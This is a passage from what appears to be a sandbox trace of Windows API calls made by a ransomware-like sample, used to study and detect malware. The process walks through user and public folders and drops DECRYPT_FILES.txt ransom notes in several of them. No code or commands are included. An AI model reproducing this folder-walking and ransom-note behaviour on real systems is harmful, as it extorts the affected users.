lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 0 [0054.174] FindClose (in: hFindFile=0x1a5de090 | out: hFindFile=0x1a5de090) returned 1 [0054.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edd00) returned 1 [0054.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edcc0) returned 1 [0054.174] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0eddb0) returned 1 [0054.174] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV", nBufferLength=0x105, lpBuffer=0x1c0ed8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV", lpFilePart=0x0) returned 0x1b [0054.174] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\", nBufferLength=0x105, lpBuffer=0x1c0ed840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\", lpFilePart=0x0) returned 0x1c [0054.175] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x1c0eda50 | out: lpFindFileData=0x1c0eda50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de090 [0054.175] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.175] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x89e5e11e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x89e5e11e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0054.175] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 1 [0054.175] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0054.175] FindClose (in: hFindFile=0x1a5de090 | out: hFindFile=0x1a5de090) returned 1 [0054.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edd00) returned 1 [0054.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edcc0) returned 1 [0054.176] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ed4b0) returned 1 [0054.176] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media", nBufferLength=0x105, lpBuffer=0x1c0ecfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media", lpFilePart=0x0) returned 0x28 [0054.176] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\", nBufferLength=0x105, lpBuffer=0x1c0ecf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpFilePart=0x0) returned 0x29 [0054.176] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\*", lpFindFileData=0x1c0ed150 | out: lpFindFileData=0x1c0ed150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de090 [0054.176] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ed1a0 | out: lpFindFileData=0x1c0ed1a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.176] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ed1a0 | out: lpFindFileData=0x1c0ed1a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0xab, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0054.176] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ed1a0 | out: lpFindFileData=0x1c0ed1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x940000, dwReserved0=0x0, dwReserved1=0x0, cFileName="win7_scenic-demoshort_raw.wtv", cAlternateFileName="WIN7_S~1.WTV")) returned 1 [0054.176] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ed1a0 | out: lpFindFileData=0x1c0ed1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0054.177] FindClose (in: hFindFile=0x1a5de090 | out: hFindFile=0x1a5de090) returned 1 [0054.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ed400) returned 1 [0054.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ed3c0) returned 1 [0054.177] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ed4b0) returned 1 [0054.177] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media", nBufferLength=0x105, lpBuffer=0x1c0ecfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media", lpFilePart=0x0) returned 0x28 [0054.177] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\", nBufferLength=0x105, lpBuffer=0x1c0ecf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpFilePart=0x0) returned 0x29 [0054.177] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\*", lpFindFileData=0x1c0ed150 | out: lpFindFileData=0x1c0ed150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de090 [0054.177] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ed1a0 | out: lpFindFileData=0x1c0ed1a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.178] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ed1a0 | out: lpFindFileData=0x1c0ed1a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0xab, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0054.178] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ed1a0 | out: lpFindFileData=0x1c0ed1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x940000, dwReserved0=0x0, dwReserved1=0x0, cFileName="win7_scenic-demoshort_raw.wtv", cAlternateFileName="WIN7_S~1.WTV")) returned 1 [0054.178] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1c0ed1a0 | out: lpFindFileData=0x1c0ed1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x940000, dwReserved0=0x0, dwReserved1=0x0, cFileName="win7_scenic-demoshort_raw.wtv", cAlternateFileName="WIN7_S~1.WTV")) returned 0 [0054.178] FindClose (in: hFindFile=0x1a5de090 | out: hFindFile=0x1a5de090) returned 1 [0054.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ed400) returned 1 [0054.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ed3c0) returned 1 [0054.178] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1c0ecf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x3a [0054.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ed420) returned 1 [0054.178] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\DECRYPT_FILES.txt" (normalized: "c:\\users\\public\\recorded tv\\sample media\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x404 [0054.180] GetFileType (hFile=0x404) returned 0x1 [0054.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ed390) returned 1 [0054.180] GetFileType (hFile=0x404) returned 0x1 [0054.180] WriteFile (in: hFile=0x404, lpBuffer=0x21f4218*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1c0ed468, lpOverlapped=0x0 | out: lpBuffer=0x21f4218*, lpNumberOfBytesWritten=0x1c0ed468*=0x9d5, lpOverlapped=0x0) returned 1 [0054.181] CloseHandle (hObject=0x404) returned 1 [0054.181] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1c0ed840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x2d [0054.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0edd20) returned 1 [0054.181] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\DECRYPT_FILES.txt" (normalized: "c:\\users\\public\\recorded tv\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x404 [0054.182] GetFileType (hFile=0x404) returned 0x1 [0054.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edc90) returned 1 [0054.182] GetFileType (hFile=0x404) returned 0x1 [0054.182] WriteFile (in: hFile=0x404, lpBuffer=0x21f6930*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1c0edd68, lpOverlapped=0x0 | out: lpBuffer=0x21f6930*, lpNumberOfBytesWritten=0x1c0edd68*=0x9d5, lpOverlapped=0x0) returned 1 [0054.183] CloseHandle (hObject=0x404) returned 1 [0054.183] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x21 [0054.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee620) returned 1 [0054.183] CreateFileW (lpFileName="C:\\Users\\Public\\DECRYPT_FILES.txt" (normalized: "c:\\users\\public\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x404 [0054.183] GetFileType (hFile=0x404) returned 0x1 [0054.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee590) returned 1 [0054.183] GetFileType (hFile=0x404) returned 0x1 [0054.184] WriteFile (in: hFile=0x404, lpBuffer=0x21f9030*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1c0ee668, lpOverlapped=0x0 | out: lpBuffer=0x21f9030*, lpNumberOfBytesWritten=0x1c0ee668*=0x9d5, lpOverlapped=0x0) returned 1 [0054.184] CloseHandle (hObject=0x404) returned 1 [0054.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0054.185] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents", lpFilePart=0x0) returned 0x2a [0054.185] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpFilePart=0x0) returned 0x2b [0054.185] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0054.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5e0) returned 1 [0054.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0054.187] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood", lpFilePart=0x0) returned 0x25 [0054.188] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpFilePart=0x0) returned 0x26 [0054.188] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0054.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5e0) returned 1 [0054.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0054.190] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood", lpFilePart=0x0) returned 0x27 [0054.190] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpFilePart=0x0) returned 0x28 [0054.190] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0054.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5e0) returned 1 [0054.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0054.192] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent", lpFilePart=0x0) returned 0x24 [0054.192] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpFilePart=0x0) returned 0x25 [0054.192] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0054.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5e0) returned 1 [0055.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0055.094] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", lpFilePart=0x0) returned 0x29 [0055.096] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpFilePart=0x0) returned 0x2a [0055.099] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0055.111] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.115] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0055.118] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0055.120] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0055.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0055.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0055.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0055.127] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", lpFilePart=0x0) returned 0x29 [0055.127] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpFilePart=0x0) returned 0x2a [0055.127] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0055.127] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.127] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, 